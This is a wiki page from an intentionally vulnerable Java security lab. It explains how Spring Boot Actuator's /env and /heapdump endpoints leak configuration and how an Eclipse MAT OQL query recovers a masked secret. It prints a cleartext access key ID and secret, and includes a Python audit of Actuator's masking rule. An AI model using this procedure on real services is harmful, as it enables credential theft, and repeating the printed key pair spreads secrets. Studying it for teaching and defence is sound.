Actuator Information Leakage
JoyChou edited this page Apr 25, 2023 · 2 revisions
The Spring version is 1.5.1. An AK/SK pair (access key ID and secret) is configured in application.properties and is then exposed through Actuator's env endpoint. Because the property name contains the string "secret", Actuator masks it by default. In Spring 1.x the endpoint is /env.

Information from application.properties leaked via /env:
```
applicationConfig: [classpath:/application.properties]: {
joychou.security.csrf.method: "POST",
joychou.business.callback: "callback_",
joychou.security.referer.uri: "/jsonp/**",
spring.datasource.url: "jdbc:mysql://localhost:3306/java_sec_code?allowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC",
joychou.security.csrf.enabled: "false",
joychou.security.referer.enabled: "false",
spring.datasource.password: "******",
spring.datasource.driver-class-name: "com.mysql.cj.jdbc.Driver",
management.security.enabled: "false",
endpoints.enabled: "true",
joychou.security.jsonp.referer.check.enabled: "true",
swagger.enable: "true",
spring.datasource.username: "root",
mybatis.mapper-locations: "classpath:mapper/*.xml",
joychou.security.csrf.exclude.url: "/xxe/**, /fastjson/**, /xstream/**, /ssrf/**, /deserialize/**",
joychou.security.jsonp.callback: "callback, _callback",
jsc.accessKey.id: "LTAI5tSAEPX3Z5N2Yt8ogc2y",
joychou.security.referer.host: "joychou.org, joychou.com",
jsc.accessKey.secret: "******",
joychou.no.need.login.url: "/css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**",
logging.level.org.joychou.mapper: "debug"
}
```
The actual application.properties configuration:

```properties
jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
```
Besides "secret", Actuator also masks the following strings; the relevant code is in org/springframework/boot/actuate/endpoint/Sanitizer.java:

```java
Sanitizer() {
    this("password", "secret", "key", "token", ".*credentials.*", "vcap_services");
}
```
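To show why the /env output above masks jsc.accessKey.secret but prints jsc.accessKey.id in clear, here is an added Python example (not part of this page or the java-sec-code project) that reimplements the Sanitizer matching rule as understood from Spring Boot 1.5: a plain word in the list is matched only at the end of the property name, case-insensitively. The sample properties and the HARDENED_KEYS_TO_SANITIZE list are constructed assumptions for the demonstration.

```python
import re

# Default patterns from the Spring Boot 1.5.x Sanitizer constructor quoted above.
DEFAULT_KEYS_TO_SANITIZE = ("password", "secret", "key", "token",
                            ".*credentials.*", "vcap_services")
# Assumption: a hardened list a defender might configure so that every
# "*.accessKey.*" property is masked, not only the one ending in "secret".
HARDENED_KEYS_TO_SANITIZE = DEFAULT_KEYS_TO_SANITIZE + (".*accessKey.*",)
_REGEX_PARTS = ("*", "$", "^", "+")

# Constructed sample: the page's property names with placeholder values.
SAMPLE_PROPERTIES = """
spring.datasource.username=root
spring.datasource.password=PLACEHOLDER_DB_PASSWORD
jsc.accessKey.id=PLACEHOLDER_ACCESS_KEY_ID
jsc.accessKey.secret=PLACEHOLDER_ACCESS_KEY_SECRET
"""


def _to_pattern(entry):
    """Mirror Sanitizer.getPattern as assumed here: an entry containing a regex
    metacharacter is used as-is; a plain word is anchored to the END of the key
    as '.*<word>$'. A key is masked only if it ends with the word, which is why
    'jsc.accessKey.id' is printed in clear while 'jsc.accessKey.secret' is not."""
    if any(part in entry for part in _REGEX_PARTS):
        return re.compile(entry, re.IGNORECASE)
    return re.compile(".*" + entry + "$", re.IGNORECASE)


def sanitize(key, value, keys_to_sanitize=DEFAULT_KEYS_TO_SANITIZE):
    """Return '******' when the whole key matches any pattern, else the value."""
    for pattern in map(_to_pattern, keys_to_sanitize):
        if pattern.fullmatch(key):
            return None if value is None else "******"
    return value


def audit_properties(text, keys_to_sanitize=DEFAULT_KEYS_TO_SANITIZE):
    """Parse key=value lines and return the entries /env would show unmasked."""
    exposed = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if sanitize(key, value, keys_to_sanitize) == value:
            exposed[key] = value
    return exposed


if __name__ == "__main__":
    for key in audit_properties(SAMPLE_PROPERTIES):
        print("exposed by the default Sanitizer:", key)
```

In Spring Boot 1.x the real list is configurable through the endpoints.env.keys-to-sanitize property, which is where a hardening change such as the extra pattern above would be applied.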
Through the /env endpoint we obtained the plaintext AK and the masked SK; the remaining question is how to obtain the plaintext SK. Fetch a heap dump via /heapdump and read the plaintext SK with Eclipse's MAT tool: the secret ultimately lives in a String, and in Spring 1.x the key and value of that String are stored in java.util.Hashtable$Entry, so MAT's OQL feature (SQL-like) can query it directly:

```sql
select * from java.util.Hashtable$Entry x WHERE toString(x.key).contains("jsc.accessKey")
```
| | Spring 1.x | Spring 2.x |
|---|---|---|
| Information leakage route | /env | /actuator/env |
| Heap dump route | /heapdump | /actuator/heapdump |
| OQL | java.util.Hashtable$Entry | java.util.LinkedHashMap$Entry |